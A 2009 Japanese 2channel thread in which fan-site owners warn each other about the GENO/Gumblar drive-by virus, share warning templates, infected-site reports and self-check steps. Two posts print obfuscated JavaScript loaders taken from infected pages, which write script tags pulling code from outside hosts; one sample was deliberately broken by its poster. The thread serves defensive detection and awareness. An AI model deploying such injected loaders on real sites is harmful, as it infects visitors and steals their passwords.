昨日自分も新刊チェックでサーチとか回ったけど、
感染はしてなくてホッとした(ウイルスの事は今日知った)
でも自ジャンルは安心…とは長くは言ってられないかも

820 :GENO:2009/05/16(土) 18:09:51 ID:wQTybYbw0
対策したつもりで出来てないとこが意外に多いんで注意な

821 :GENO:2009/05/16(土) 18:10:03 ID:njQJ2zNKO
今、出先でこの現状を知ってガクブルしてるんだが
自サイトのブログにも今すぐ、この件についての記事を書いて注意換気すべきだろうか?
(携帯から記事書き込めるので

822 :geno:2009/05/16(土) 18:10:43 ID:q2sKnS5r0
>>794
描いてくれてる人がいて今のところランキング1位になってる
他にも結構描いてる人いるから手ブロは大丈夫だと思いたい
手ブロはリア小とかもザラだからな…

823 :GENO テンプレ1案:2009/05/16(土) 18:11:07 ID:ujLFTIV80
2以下はまかせた
セキュ板のスレ誘導はどうするんだ?するなら2以下に

-----------------------------------------------------------------

新種のコンピュータウィルスが流行っています。
感染サイトを見ただけで感染発症し、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。
全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。

特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。

【よくある質問】
Q:感染するとどうなるの?
A:あなたのパソコンに侵入したウイルスは、ネットに繋がった時点で
 パスワード、クレジットカードの情報、FTPのパスワードなどを抜いてしまいます。
 感染者のパソコンからアップされたサイトのファイルにウイルスコードが自動挿入され、
 そのサイトを見た人を感染させます。

Q:VistaとMacは感染しないの?
A:某企業サイトでの発見直後はVista、Macには感染しないと言われましたが
 新種も現れており安心できる状況ではありません。

詳細・感染の確認方法・対策は以下のまとめWikiと>>2-5あたり

同人サイト向け・通称「GENOウイルス」対策まとめ
ttp://www31.atwiki.jp/doujin_vinfo/


824 :GENO:2009/05/16(土) 18:11:19 ID:vNLIWV+e0
虹裏がやられたってマジでか

所で素朴な疑問なんだが
sqlsodbc.chm
こいつのバックアップを取っておいて感染後上書きするとどうなるんだろうか

825 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:11:33 ID:I41uEJFb0
とりあえず友達全員に教えといたわ
イベントあるならイベントで会った人にいっとけばいいんじゃね
後マスクくらいしろよ

826 :GENO:2009/05/16(土) 18:12:08 ID:mOudVfSD0
>>821
そんくらい自分で判断出来んなら何もしなくていい

827 :GENO:2009/05/16(土) 18:12:23 ID:GRAKPFWg0
>>821
自分はサイトの日記に書いた
一人でも多くの人間が注意を促せば、それだけ被害は少なくなると思う

828 :GENO:2009/05/16(土) 18:12:46 ID:uy8wj/XV0
>>807
あのな亜種って知ってる?

829 ::2009/05/16(土) 18:14:02 ID:LEjfHM+rO
酷いな…同人も大打撃じゃないか。

ジャンル存続云々より、今はウイルス拡大防止だろ。

ウイルス騒ぎで一時サイトが閉鎖したりしても、騒ぎが終息してから復活する人は復活するだろうし、しなきゃそれまでの想いでした、って事だろ。

こんな時にまでジャンルジャンル騒いでる奴ってアホだな。

830 :GENO:2009/05/16(土) 18:14:13 ID:STQt++5e0
>>818
vistaは現時点では大丈夫みたいだが、
オンラインスキャンとsqlsodbc.chmのチェックはしといたら?
自分もvistaだけどやれる事は全部やったよ

831 :じぇの:2009/05/16(土) 18:14:15 ID:LgAPtote0
>>821
さすがそれくらいは自分の好きにしたら…?

832 :GENO:2009/05/16(土) 18:14:16 ID:4qrTmet30
伏字がどーの言う前に
wikiの見方もわからん
自分のサイトのソースの見方もわからんような奴のサイトは
この際全部消えてしまえばいいよ…
これで2次ジャンルの危機管理、意識とか主張されてもバカバカしい

833 :GENO:2009/05/16(土) 18:14:58 ID:q2sKnS5r0
>>823
セキュ板への誘導はなしでいいと思う
これ以上初心者あっちに流したくない
同人の所為で広まったみたいな認識になってきてるし

834 :GENO:2009/05/16(土) 18:15:09 ID:mX/VopHL0
>>823
セキュ板のスレ誘導はしないほうがいいな
向こうであれてしまう

835 :GENO:2009/05/16(土) 18:15:37 ID:kN7C0/bl0
>>823
おk

セキュ板の誘導はない方がいい
向こうも質問厨が押し寄せて半ばカオス化してる

836 :821:2009/05/16(土) 18:15:56 ID:njQJ2zNKO
レスあり、記事書くわ

>>823のテンプレ貰ってく。
帰宅次第自分のPCチェックしてファイルのバックアップ取る
まだ報告ないジャンルなんで間に合っててくれ……

837 :げの:2009/05/16(土) 18:16:10 ID:afm0lJ4jO
>>821
サイトトップに注意書きと簡単なまとめ載せてみた
でもドピコだし騒動でかなり人来なくなってるから意味ないな…
もっと大きなサイトなら良かったんだが

838 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:16:45 ID:bmeWatfA0
>>807
おまいこそ何を期待してるんだ

839 :GENO:2009/05/16(土) 18:16:52 ID:lapl18Rv0
>823
セキュの誘導はもうしないほうがいい
これから新しく来る今北さんたちが向こう行ってもどうにもならない
向こうで初心者質問くりかえしてフルボッコに合うのが関の山だと思う

840 :GENO:2009/05/16(土) 18:17:15 ID:xmkBc4L6P
そりゃ「同人ローカルルール>>>>ウィルスへの注意喚起」と主張する人おおすぎで
「同人ってなにそれこわい」ってなられるのも当然だろ・・・。
企業が感染隠したりする対応も叩かれてるというのに。

841 :GENO:2009/05/16(土) 18:17:19 ID:pcqA0/KN0
海鮮だから二次感染の危険性だけはないけどネット通販とかよく利用してるからめちゃくちゃ怖い…

842 :GENO:2009/05/16(土) 18:17:47 ID:uHPzWLxWO
意味ないけどふたば携帯でみてきた

二次裏は通常通りスレ進んでます
管理人要望板にもウイルスの報告なし

843 :名無し:2009/05/16(土) 18:17:51 ID:2rvHCm1xO
携帯サイトのサーバーもやばいの?

844 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:17:58 ID:eQafMeB50
感染確認されたり何も分からなくて不安なら
セキュリティ上何の断りも無くとも即閉鎖するのは正しい
維持やめんどうでほったらかしで撒き散らすのは迷惑

845 :geno:2009/05/16(土) 18:18:44 ID:JMWvRLu6P
>>790
再インストールしてパス書き変えたら跡地つくるつもりかもよ

846 : :2009/05/16(土) 18:18:44 ID:dhazjnvD0
>>824
そのファイルはあくまで目印になってるだけで
他にもやられるファイルはある

847 :GENO:2009/05/16(土) 18:19:32 ID:oRZKM7s90
>>837
小さなことからコツコツと、だ。
誰もやらないより一人でも多く呼びかけるようやったほうがいいと思う。

848 :GENO:2009/05/16(土) 18:19:56 ID:OPjvi40EO
>>843
以前に愛島全体がウィルスにやられたことあるだろ
安心すんな

849 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:20:26 ID:XpshxGrz0
>>581
もう遅いけどノートン入れてたら先生の仕業じゃなかったかな

850 :GENO:2009/05/16(土) 18:20:58 ID:SyLRqLEN0
>>828 >>838
あー、閲覧側に限った話をしちゃってたんで、それで行き違いがあるのかな。
どういう亜種が現れているのか知っていたら教えてほしい。
Flash PlayerとAdobe Readerを最新版にしていても、両者が原因でGENO関係で被害を受けたって報告があるんですか?
ただ、もしそうなら未知の脆弱性で被害が拡大しているわけで、セキュリティベンダーはもっと速く動いていると思うんですが。

851 :GENO:2009/05/16(土) 18:21:19 ID:IgRMmjVnO
明日はケットコム主催のボーカロイドのイベントあるんだけど、ボカロサーチが感染してるならケットコムは大丈夫なんだろうか
ケットコムも感染してたらヤバいな

852 :GENO:2009/05/16(土) 18:21:25 ID:lA4iAsSeO
>>824
sqlsodbc.chmだけ直しても無駄。それはウィルスの症状の1つってだけなので
『豚ウィルス感染!解熱剤で熱下げたから咳出まくってるけど大丈夫だよね』って
言ってるのと同じ。

対策大丈夫!っていってる人も今回のウィルスは亜種が出易いのが怖いってーのを
覚えてくれ…avast!優秀でも最新の亜種は分からんのよ…いつvistaやIE7でもやられる
亜種が出てもおかしくないのよ…orz

853 :GENO:2009/05/16(土) 18:21:49 ID:wQTybYbw0
ノートン先生なら今俺の隣で寝てるよ

854 :ゲノ:2009/05/16(土) 18:21:58 ID:73r3a0iJO
虹裏やられたってのはソースあるの?デマ?

855 :GENO:2009/05/16(土) 18:22:03 ID:i6/Zrtyj0
>>851
それは本当に洒落にならん…

856 :GENO:2009/05/16(土) 18:22:06 ID:ouvbuwBb0
回線なら大丈夫とか思っている人がいるようだけど
踏み台に利用されるという点では去年の薬屋ウイルスよりたちが悪いウイルスだよ。

857 :報告:2009/05/16(土) 18:22:18 ID:QEvo2/9u0
545 名前: コバノランタナ(関東・甲信越)[] 投稿日:2009/05/16(土) 18:19:21.70 ID:XdcmiJ/i
スレに書き込んでる途中に連投になったので、転載お願いします!

ボカロ幸感染報告したものです。
幸管理人さんの友人の幸の感染が確認されました。
サイト自体に埋め込まれちゃってるらしくどうしようもないです。
登録は5000ほどで、二次音楽だそうです(ボカロ・歌ってみたランキング的なもの)
明日がボーマスなせいで今日だけでもカウンターが7000は回ってるみたいです!
注意喚起してきます。


【管理も】同人サイト・GENOウィルス注意2【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242443932/
↑このスレです。誰か転載お願いします!


取り急ぎ転載 ダブったらすまん

858 :GENO:2009/05/16(土) 18:22:44 ID:BfrfM/sk0
来たよ
自サイトで注意喚起したら「ねらだったんですね!」米が
こんな時に自分がねらだってばれる心配なんかしてられるかと憤慨して言ってやりましたよ

「知り合いから聞きました」

859 :geno:2009/05/16(土) 18:22:53 ID:JMWvRLu6P
7000…!

860 :GENO:2009/05/16(土) 18:23:23 ID:WMHVCQg00
質問なんだがJavaScript使ってないから2ちゃんの専用ブラウザは平気なんだよな?

861 :geno:2009/05/16(土) 18:23:28 ID:WSWfbe9U0
7000とか…怖すぎるな…

862 :サイト”管理”人:2009/05/16(土) 18:24:08 ID:cpNxQDbiO
すみません
ウイルスの件今知った者です
自サイトのソースをチェックしようと思うのですが、ウイルスが感染した際に貼られるjavaはどのようなものかご存知の方おられましたらお願いいたします。

863 :GENO:2009/05/16(土) 18:24:48 ID:ouvbuwBb0
マジレスすると、まずはAdobe製品の脆弱性、を強調して告知した方がいい
去年の薬屋ウイルス騒動もFlash Playerの脆弱性を全面に出して告知して
周知が広まった。

その後で同人系・ねら系まとめに誘導

864 :GENO:2009/05/16(土) 18:24:49 ID:2baUUktp0
7000がまた広がるんだろ?
なにこのウイルス・・・

865 :GENO:2009/05/16(土) 18:24:52 ID:cK7QQ7hl0
>>854
どっちであっても今虹裏見に行くのは自殺行為

866 :GENO:2009/05/16(土) 18:25:01 ID:JLSn9lA+0
>>857
えらいこっちゃ…

867 :GENO:2009/05/16(土) 18:25:23 ID:RwVE/EfH0
>>850
いや、今後どんな亜種が現れるかわからない、
現状これで完璧はありえないって注意喚起してんだろ
いいかげん気づいてくれよ


868 :geno報告というか依頼:2009/05/16(土) 18:25:28 ID:jxRVr/+e0
まとめ管理人様おつかれさまです

「とりあえず感染してるか確認する手順」の

>→ XPユーザー
>  背景が黒いウィンドウを選択。
>  小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
>   \を全角にしてあるので、コピペせずすべて半角で手入力すること

の辺りかFAQに

>「ドライブCのボリュームラベルがありません C:\WINDOWS\system32のディレクトリファイルが見つかりません」
>と出た場合、マイコンピュータのCドライブのプロパティ開けて
>全般タブの一番上にある空欄に適当な名前を付けてから再度検索するか
>マイコンピュータからフォルダを辿って直接system32内を探してください。

って追記してもらえないか
ボリュームラベルがないのとウイルスとは別問題だし、再起動でどうこうなる問題でもない
普通に使う分にはなくても構わないラベルだしな

869 :geno:2009/05/16(土) 18:25:43 ID:fsWEj42p0
>>857
え、歌ってみたも入ってんのか・・・

870 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:26:16 ID:bmeWatfA0
>>850
一応関連スレを覗いているが、最新版で被害報告はないみたい。
但しそれも現時点で、って話だからね。今後どうなるかはなんともいえないから
絶対安全って言わない方がいいと思う。初心者はそれで安心してしまう。

亜種は現れてるよ。
ただセキュ板荒れててそんな話をする状況じゃないね。

871 :ge:2009/05/16(土) 18:26:29 ID:wh+11tX1O
>>862
>>125

872 :GENO:2009/05/16(土) 18:26:29 ID:RwVE/EfH0
>>862
>>1

873 :GENO:2009/05/16(土) 18:26:30 ID:TV+NV+ev0
>>857
オワタ

874 :GENO:2009/05/16(土) 18:26:42 ID:k7S1lClv0
>>858

うちもきっと来るわ
そしたら、そのセリフ借りるね……

875 :GENO:2009/05/16(土) 18:26:43 ID:lYCNv42G0
>>867
もう触んな…そっとしておけ

876 :GENO:2009/05/16(土) 18:27:24 ID:Gh3ZB53n0
エヴァ(小説サーチ)
小野不由美(サーチ)
ボーカロイド(サーチ2つ?1つは登録1700、もう1つは登録数5000でカウンター7000/日)

リボーン(オンリー+プチオンリー告知サイト・ファンサイト)
鋼の錬金術師(オンリー告知サイト)
おお振り(アンソロ告知サイト)
戦国BASARA(アンソロ告知サイト)
咎狗の血(アンソロ告知サイト)

ヘタリア (PC鯖使用の携帯向け同盟)

とりあえず大規模感染いきそうなのはこのあたり?ボカロやばいな

877 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:27:34 ID:XpshxGrz0
>>862
>>633の画像みたいな意味不明なやつらしい
自分自身で感染例を見たわけじゃないので詳しい人頼みます

878 :GENO:2009/05/16(土) 18:27:39 ID:Q3syTjec0
>>854
ソースに妙な物は無いね
デマだろ

879 :GENO:2009/05/16(土) 18:28:53 ID:lGXsY/+00
なんか大量感染で加速しそうな悪寒
早めに次スレ用意したほうがいいと思います

880 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:29:00 ID:Q6FwpwdZ0
男性向けショタ系サイトも危ないというレスをみた

881 :sage:2009/05/16(土) 18:29:04 ID:afm0lJ4jO
ねらばれも何もうちは投下したやつ置いてるから今更だぜいヒャハァ


だからお付き合い広げなかったんだがw

882 :GENO:2009/05/16(土) 18:30:01 ID:NvgL4rYM0
とりあえず自サイトが感染してないかどうかを調べたいんだけど
データ全部ローカルに落としてもPC感染しますか?

883 :geno:2009/05/16(土) 18:30:01 ID:ivgR4yei0
ほんとごめん
幸ってなに? 教えてほしい
同人やってるが2chではあんまり同人系回らんから
わからんのだわ

上にもあったけどはっきり明記されなくて困ってる
CPのことか?

884 :G:2009/05/16(土) 18:30:22 ID:ZLwS0etV0
すまんが、セキュ板の方へのリンク貼るのは止めてもらえ無いだろうか。
あっちからは貼ってるから分かると思うんだ。

885 :GENO:2009/05/16(土) 18:30:23 ID:STQt++5e0
>>883
サーチの事

886 :GENO:2009/05/16(土) 18:30:31 ID:WMHVCQg00
幸=サーチエンジン

887 :げの:2009/05/16(土) 18:30:34 ID:GfLmKoZqO
>>883
サーチエンジン

888 :GENO:2009/05/16(土) 18:30:35 ID:Q3syTjec0
>>883
俺も知らなかったが話の流れから見ると「サーチ」のようだ

889 :GENO:2009/05/16(土) 18:30:39 ID:nyj37hss0
虹裏って何の伏せだ?


890 :geno:2009/05/16(土) 18:30:49 ID:LkZJEwj50
>>883
幸=サーチ

891 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:30:50 ID:DUu+Qe+w0
>>883
サーチ

892 :げの:2009/05/16(土) 18:30:56 ID:afm0lJ4jO
>>883
サーチ

893 :geno:2009/05/16(土) 18:31:04 ID:jxRVr/+e0
>>900は次スレよろ

894 :GENO:2009/05/16(土) 18:31:06 ID:0gY22C790
>>857
OMG
ボカロもサブでやってる人多いだろうに・・・なんてこったい

895 :GENO:2009/05/16(土) 18:31:14 ID:z6rWJ7hcO
>>883
さーち

896 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:31:25 ID:SUmAXbK30
PCニュースにスレッド立ってるけど
萌えニューに立ててもらった方がいいんじゃないだろうか
どうやってスレ依頼するのか知らないが・・・

897 :GENO:2009/05/16(土) 18:31:26 ID:dUhoo+Zw0
まとめ管理人さん、お疲れ様です。

>>633の画像をwikiに入れたらいいのではないかと思うのですが…。
自分でソース見て判断する時の助けになるかと

898 :GENO:2009/05/16(土) 18:31:32 ID:pbsx4U5a0
オマイラの優しさ連携プレーに全俺が泣いた

899 :GENO:2009/05/16(土) 18:31:33 ID:JJXVNcG60
この時間帯ならもうねらじゃない人も注意文書いてるし、ねらバレしないだろ

900 :geno:2009/05/16(土) 18:31:49 ID:WSWfbe9U0
>>883大人気だなw

901 :geno:2009/05/16(土) 18:31:55 ID:fsWEj42p0
>>876
ボーマス遠征組の状況次第では対策に時間かかるかもしれないな

902 :geno:2009/05/16(土) 18:31:57 ID:LkZJEwj50
883の人気に嫉妬

903 :GENO:2009/05/16(土) 18:32:22 ID:v6bKeM/v0
このスレに限り、伏字なしの方向にしない?
日頃、同人板を覗かないサイト持ちも注意勧告につられて来ているようだし

今回の被害は深刻だから
初心者にも分かりやすいスレにしたほうがいいと思う
せめて伏字ぐらいは

904 :GENO:2009/05/16(土) 18:32:41 ID:k7S1lClv0
>>889
ふたばちゃんねるの画像掲示板の二次元裏

905 :883:2009/05/16(土) 18:33:03 ID:ivgR4yei0
あああああ!
なんで分からなかったんだろう!
みんな即レス、ありがとう!

サイトに注意のせてきます

906 :GENO:2009/05/16(土) 18:33:06 ID:RwVE/EfH0
>>882
まず自分のPCをチェックだ

907 :geno:2009/05/16(土) 18:33:15 ID:LkZJEwj50
>>900
次スレよろしく
*****************以下減速***************

908 :GENO:2009/05/16(土) 18:33:16 ID:smog3tIQ0
用語集イチイチ作るより伏字なしのが良いだろうね

909 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:33:17 ID:XpshxGrz0
刷れ立ては900?

910 :GENO 報告は名前欄に「報告」推奨!:2009/05/16(土) 18:33:39 ID:ujLFTIV80
>>857 やべえ……
Wiki管理人さん、これは大きくとりあげたほうがいいかもしれませんよ

>>858
この事態を知りながら人に注意もせずに、注意喚起したおまいに馬鹿米するとは…
そんな暇な糞野郎より、おまいのほうが1万倍立派だよ。馬鹿はスルーしとけ。

>>896
同人系だけの話じゃないから、周知を考えればニュー速+でもいいくらいだ

911 :GENO:2009/05/16(土) 18:34:16 ID:hsMweheE0
>>840
いまその話してるのお前だけなんだが誰と戦ってるの?

912 :GENO:2009/05/16(土) 18:34:47 ID:ZjGJKiW50
>>858
それ分かるってことはお前もねらーじゃねえかと突っ込みたくなるなw
魔法の言葉GJ

913 :GENO:2009/05/16(土) 18:35:42 ID:BrvMDLebO
動画サイトで一個感染してたところがあった
そこに最近本編が大量アップされて、まとめサイトにもリンクがはられてた
南公園ももしかしたらやばいかも

小さいジャンルだから大丈夫だとは思うけど…

914 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:35:46 ID:52KxMhxe0
sqlsodbc.chm立ち上がらないわソース開けないわネットは強制終了炸裂だし
これはもうアレか・・・  再インスコ準備するわorz

915 :GENO:2009/05/16(土) 18:37:19 ID:k7S1lClv0
しっかしサイトトップに注意書き貼っておいても読む人少ないわー
5%も居らん

916 :GENO:2009/05/16(土) 18:37:38 ID:OPjvi40EO
>>913
動画サイト名kwsk

917 :GENO:2009/05/16(土) 18:38:04 ID:pbsx4U5a0
サイトトップと日記に大きく書いてたほうが効果的かもしれんね。

918 : :2009/05/16(土) 18:38:12 ID:dhazjnvD0
>>914
立ち上がる必要はないんじゃないの?

919 :GENO:2009/05/16(土) 18:38:36 ID:JLSn9lA+0
>>915
それでもないよりはマシだ
そう思うことにしておこうや

920 :GENO:2009/05/16(土) 18:39:12 ID:5AlQPwu90
セキュリティ板のGENOスレ4にあったJavaScriptの一例貼るよ

スクリプト language=ジャバcript<!--
(function(){var a3B2='%';var ONE=unescape((',76ar,20,61,3d,22,53c,72iptE,6egine,22,2cb,3d,22Ver,73ion
(,29,2b,22,2cj,3d,22,22,2c,75,3d,6eaviga,74or,2e,75serAgent,3bif,28,28u,2eind,65,78,4f,66,28,22Win,22),
3e,30,29,26,26(u,2e,69ndexOf(,22NT,20,36,22),3c0),26,26,28docum,65,6et,2ecook,69e,2ein,64,65xO,66(,22miek,3d1,22,29,3c0),26,26(t,79peof(zrvz,74s),21,3d,74ypeof(,22A,22))),
7bzr,76zts,3d,22A,22,3bev,61,6c,28,
22if(w,69,6e,64o,77,2e,22+,61,2b,22)j,3dj+,
22,2b,61+,22Ma,6aor,22+b+a+,22Mi,6eor,22+,62+a,2b,22B,75ild,22+b+,22j,3b,22),3bd,6fcumen,74,2ewri,74e,28,22,3c,73cript,20s,72c,3d,2f,2fgu,6dblar,2ecn,
2frss,2f,3fid,3d,22,2bj,2b,22,3e,3c,5c,2fscrip,74,3e,22),3b,7d').replace(/,/g,a3B2));eval(ONE)})();
-->スクリプト
スクリプト language=ジャバscript><!--
(function(px0E){var vU12=('v.61r.20a.3d.22S.63rip.74Engine.22.2c.62.3d.22V.65r.73ion()+.22.2cj.3d.22.22.2cu.3dna.76igato.72.2e.75.73erA.67ent.3b
if((u.2e.69ndexO.66.28.22Wi.6e.22.29.3e.30).26.26.28u.2eind.65x.4f.66.28.22.4eT.206.22).3c0).26.26(doc.75.6de.6et.2ec.6foki.65.2ei.6edexOf(.22.6diek.3d1.22).3c0).26.26.28.74.79.70e.6ff
(zrvzts.29.21.3dty.70eo.66(.22A.22))).7b.7arvz.74s.3d.22A.22.3be.76al.28.22if(.77ind.6fw.2e.22+.61+.22)
j.3dj+.22+a+.22Major.22+b+a+.22.4din.6fr.22+.62.2ba.2b.22.42uild.22+b+.22j.3b.22.29.3b.64ocument.2ewrite
(.22.3cscri.70t.20.73rc.3d.2f.2fg.75.6dblar.2ecn.2frss.2f.3f.69d.3d.22.2bj+.22.3e.3c.5c.2fs.63ri.70t.3e.22).3b.7d').replace(px0E,'%');eval(unescape(vU12))})(/./g);
-->スクリプト

- - - - - - - - - - - - - - - - - - - -
もちろんこの限りではないだろうね
虹裏が〜とかヤフーが〜とか今日なんか色々出てたけど愉快犯がデマ流してるのもあるだろうけど、
あんま普段JavaScriptのコードとか見たことない人が、普通のウイルスでも何でもないJavaScriptのタグ見て
「ウイルス感染してる!」とか勘違いして騒ぐ件も少なからずありそう

921 :GENO:2009/05/16(土) 18:39:22 ID:JWfK2nMr0
>>915
5%の人が認知してくれているじゃないか

922 :GENO:2009/05/16(土) 18:39:26 ID:RwVE/EfH0
>>913
お願いですからサウスパークと明記してください

923 :GENO:2009/05/16(土) 18:39:39 ID:epEXNtBJ0
イラストサイトの人は
キャラクターに噴出しで注意!とか言わせてる絵を
トップに置いとくとか出来そうだな

924 :GENO:2009/05/16(土) 18:39:46 ID:uHPzWLxWO
これはもうだめかもわからんね

925 :GENO:2009/05/16(土) 18:39:49 ID:58PrCe2G0
>>915
自分も書いたしリンクも張ったが
一割以下しか見てない。そもそもの絶対数が少ないってのもあるが
多くが見るであろう大手とかに限ってオフしてるの多いから、原稿中だの遠征中だので
気づいてないのかも…
平日の昼日中じゃないだけマシなのか、イベント前だから余計アレなのか…

926 :GENO:2009/05/16(土) 18:40:23 ID:Q3eRMW+S0
伏せたいやつは伏せて伏せたくないやつは伏せないでいいよもう…
伏せる伏せないより情報が集まる事の方が重要だろ

927 :GENO:2009/05/16(土) 18:40:25 ID:YM6POmPN0
>>862
まだ見てるかな?
HTMLファイルは<body>タグより上、.jsファイルなら最下行に見覚えの無い
<script language="JavaScript 〜 </script>があったら、
そのタグ内に replace(**,***,*) or replace(**|***|*) の文字列があるかどうか探す
スクリプトからreplaceの括弧内の文字列を削除してエンコードすると
ウイルスダウンロード先のアドレスに変わる仕組みになっている
ソースをreplaceで検索してみるといい

928 :GENO:2009/05/16(土) 18:40:39 ID:APiqzc70O
>>915
うちもだ。幸いまだ感染報告のないジャンルだが、過疎サイトだしほぼスルーされてる。
友人に注意文送ったら「わからん」「DVD見終わってから」とか悠長なこといいやがるし…もう泣きたい

929 :GENO:2009/05/16(土) 18:40:40 ID:veAuBOXk0
>>858
お前さんは偉いよ、この非常時にネラバレとか言ってられないよな
自分もピコサイトだがサイトトップに注意書きを書いて来たぜ
「友達にメールで教えて貰いました」の一文つきでな!

930 :geno:2009/05/16(土) 18:41:03 ID:LwX4sLTz0
半年ROMとか言わないお前らのやさしさに感動した
まぁ今はググるのも危ないしね

>>903 賛成
今のところ正しくても間違ってても情報が2ちゃんくらいにしか集まらないし
わかりやすくすべきだと思う

931 :GENO:2009/05/16(土) 18:41:07 ID:b/+eltGS0
おい、次スレはまだかよ

932 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:41:44 ID:gbCprrvH0
PCのチェック二重三重にして安全を確認してから自サイトと日記、ミクシ、別のところでやってるブログ2つと
参加してるマイナーSNS、プーペガールでウィルスの告知してきた。
場所によって同人向けと一般向けのまとめを使い分けて誘導。
早く収まってくれ……。

933 :GENO:2009/05/16(土) 18:42:49 ID:wC2VoGPT0
ピコだろうとなんだろうと、注意喚起する事に意味があるんだ
注意書きを見て誰かが情報を得るんだ。その行為自体に意味があるんだよ
誰かがやるだろうって何もやらなかったら広まる情報も広まらないもんだ
自分がやるしかないんだよ

934 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:43:45 ID:bNAe6Uzb0
>>858
「知り合い(=スレのみんな)から聞きました」

嘘は言ってないよな、嘘は

935 :GENO:2009/05/16(土) 18:43:46 ID:hhHQlddm0
腐女子・情弱ウイルス FJウイルスと命名

936 :GENO:2009/05/16(土) 18:44:16 ID:DwOS+Yc30
改ざんの確認ではクリアしたけどスキャンで1個なんか引っかかったorz
このウイルスの名前ってもうあるの?
どこかにもう記載されてた?


937 :GENO:2009/05/16(土) 18:44:59 ID:O4mBjhCo0
挿入スクリプト参考に追加
※ランダムに文字を削除したから貼り付けても動かないよ

<すくりぷと language=じゃばすくりぷと><!--
(function(){var UkRR='%';var WdBp=('&61&20a&3d&22S&69ptEngi&65&22&2c&3d&22&56&
65&72s&69on+()&22&2c&6a&3d&22&22&2c&3dn&61&76ig&61tor2user&41&67ent&3bi&66
(u&2ein&6&65x&4f&66(&22C&68rm&65&22)&3c0)&26&26(&75&2ein&64ex&4ff(&22i&6e&22)
&3e0)&26&26&28u&2e&69&6d&65x&4ff&28&22&4e&54&206&22)&3c0)&26&26(&64cument
&2ecooki&65&2e&6ede&78O&66(&22&6di&6b&3d&31&22)&3c0)&26&26(t&79peo&66&28&
7arvzts)&21&3dty&70&65of&28&22A&2&7brvzt&73&3d&22A&22&3bval(&22i&66
(win&64o&77&2e&22+a+&22)))&3dj+&22+&6+&22M&61j&6fr&22+b&2b&2b&22Mi&6e&6fr
&22+a+b+&22&42uild&22+b+&22j&3&22&29&3b&646f&63ument&2ewr&69te&28&22&3cs
&63ri&70t&0&73&72c&3d&2f&2fma&72t&75&22+&22z&2e&63n&f&76i&64&2f&3fid&3d&22
&2bj+22&3c&5c&2fscrip&74&3e&22)&3b&7d').rplace(/&/g,URR);eval(uescape(WdBp))})();
--></すくりぷと>


938 :GENO:2009/05/16(土) 18:45:03 ID:TV+NV+ev0
>>923
それやるつもり

939 :geno:2009/05/16(土) 18:45:07 ID:VO6XJwmI0
>>900が次スレ立ててくれたよ
多分連投制限に引っかかってる

【管理も】同人サイト・GENOウィルス注意3【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242466997/

940 :げの:2009/05/16(土) 18:45:21 ID:tRYHiqa3O
【管理も】同人サイト・GENOウィルス注意3【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242466997/

941 :GENO:2009/05/16(土) 18:45:28 ID:pbsx4U5a0
名前はたしかダウンアド?になったんだっけか

942 :げの:2009/05/16(土) 18:45:34 ID:afm0lJ4jO
>>935
きゃー不二先輩ー
って喜ぶ奴出そうだから却下

943 :geno:2009/05/16(土) 18:45:34 ID:lGXsY/+00
次スレ立ったね
>>900乙です

944 :GENO:2009/05/16(土) 18:45:51 ID:h9dtK2bg0
伏せてあっても現状解説入るしwikiには伏せないで載るみたいだしイミフなとこいかないからどっちでもいいや
926のいう通り情報集まんないと意味ないっしょ…

945 :GENO:2009/05/16(土) 18:45:53 ID:RwVE/EfH0
>>936
スキャンでひっかかるようなものいつまでもPCに飼わないで

946 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:45:59 ID:hX/lFYJM0
>お知らせ
>メールを来た人から『トップページにトロイの木馬が付いているようです。』…びっくりをしました。
>兄にメール返事を来て、来週の土曜日で兄が直してもらいます。大変に申し訳にありませんでした。

864 名前:名無しさん、君に決めた![sage] 投稿日:2009/05/14(木) 16:12:26 ID:???
メガニウムとバクフーンのイラストがいっぱいあるな どれも上手い
ttp://kurisu06.candypop.jp/

867 名前:名無しさん、君に決めた![sage] 投稿日:2009/05/16(土) 08:40:04 ID:???
>>864
このサイト、ウィルスが入ってるんだが…

869 名前:名無しさん、君に決めた![sage] 投稿日:2009/05/16(土) 15:01:53 ID:???
2009年5月13日 03:13:16 GMTのGoogleキャッシュからウイルス確認





947 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:46:12 ID:FMfjX6SN0
>>916
おそらく「SayMove!」かと思われる


ニコニコのぞき見検索&SayMove! ウイルス感染について
申し訳ありません。更新に使っていたPCが、
通称zlkon・GENOウイルスと呼ばれているウイルスの亜種に感染していたようです。
以下の時間帯に各ページにアクセスした方は感染の恐れが有ります。

5月12日 午前6時31分〜午前8:00頃
・ニコニコのぞき見検索のトップページ・ランキングページ・再生ページ以外のHTMLページ
・SayMove!のトップページ
同日 午前6時31分〜正午頃
・ニコニコのぞき見検索のマイリスト表示ページ


心当たりある奴はクリーンアップしとけ

948 :GENO:2009/05/16(土) 18:46:21 ID:Hd92Ml+u0
元から入れていたjavaScriptの記述にものすごい決め付けで焦ったメール貰ったよ
違うって返しておいたけどこのテンションで広められてたら嫌だなあ

949 :GENO:2009/05/16(土) 18:46:25 ID:OPjvi40EO
>>936
ダウンアド

950 :GENO:2009/05/16(土) 18:46:28 ID:6WgPAgbO0
